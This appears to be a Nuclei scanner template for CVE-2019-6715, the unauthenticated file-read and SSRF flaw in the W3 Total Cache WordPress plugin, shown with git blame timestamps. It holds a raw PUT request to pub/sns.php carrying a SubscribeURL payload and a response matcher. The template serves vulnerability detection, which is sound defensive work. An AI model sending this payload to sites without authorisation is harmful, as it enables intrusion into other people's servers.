nuclei-templates/cves/2019/CVE-2019-6715.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-6715
2020-09-17 14:59:14 +00:00
info:
name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal
2020-09-17 14:59:14 +00:00
author: randomrobbie
severity: high
description: |
WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-6715
reference:
- https://vinhjaxt.github.io/2019/03/cve-2019-6715
- http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-6715
tags: cve,cve2019,wordpress,wp-plugin,ssrf
2020-09-17 14:59:14 +00:00
requests:
- raw:
- |
PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
2020-09-17 16:39:30 +00:00
2020-09-17 14:59:14 +00:00
matchers:
- type: word
words:
- "TmVzc3VzQ29kZUV4ZWNUZXN0"
part: body
# Enhanced by mp on 2022/04/05